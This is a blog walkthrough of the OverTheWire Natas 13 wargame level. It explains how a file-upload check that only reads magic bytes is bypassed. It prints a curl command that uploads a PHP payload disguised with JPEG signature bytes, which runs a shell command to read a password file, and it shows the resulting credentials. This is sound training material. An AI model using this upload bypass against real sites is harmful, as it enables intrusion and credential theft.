| << Previous challenge |
Recommended reading:
- Previous challenge
- File signature (magic number)
From the credentials discovered from the previous challenge, head up to http://natas13.natas.labs.overthewire.org and take a look at its content.
This challenge is exactly the same as the previous one, the service that's provided doesn't change, a simple form to upload an image, so I'm not going into more detail about it, you can look it up in the previous challenge. As a matter of fact, we'll just look at the source code that differs from the previous to this challenge, which are these two lines of code:
If you check the full source code, these two lines are lines 48 and 49, where the server is validating the POST request. If you take a look at the exif_imagetype function, all it does is read the first bytes in the file to check its signature. At this point you should have some idea on what we have to do in order to bypass this, we need to provide a file with a valid signature on those first bytes. Looking at this website, we know that .jpg images always start with 0xFF 0xD8 0xFF 0xE8, so all we need now is to prepend those 4 bytes at the beginning of what we're sending. We'll just take the command from the previous challenge make some minor modifications so it fits our needs, and this is what it looks like:
We just added the signature bytes at the beginning, and also a space, just so we can separate the bytes from the password. After running this command, we'll be given an URL to the uploaded file, just like before, and if we fetch that URL, this is what we get:
Like before, a single line with the password for natas14.
This challenge is exactly the same as the previous one, the service that's provided doesn't change, a simple form to upload an image, so I'm not going into more detail about it, you can look it up in the previous challenge. As a matter of fact, we'll just look at the source code that differs from the previous to this challenge, which are these two lines of code:
1 2 | } else if (! exif_imagetype($_FILES['uploadedfile']['tmp_name'])) { echo "File is not an image"; |
echo "\xFF\xD8\xFF\xE8 <?php passthru('cat /etc/natas_webpass/natas14'); ?>" | curl http://natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY@natas13.natas.labs.overthewire.org/ --form "uploadedfile=@-" --form "filename=exploit.php"
ÿØÿà Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
| User | natas14 |
| Password | Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 |
Not very effective method of preventing malicious code from being uploaded, as we could simply overcome the challenge.
Never Settle,
| << Previous challenge |
No comments:
Post a Comment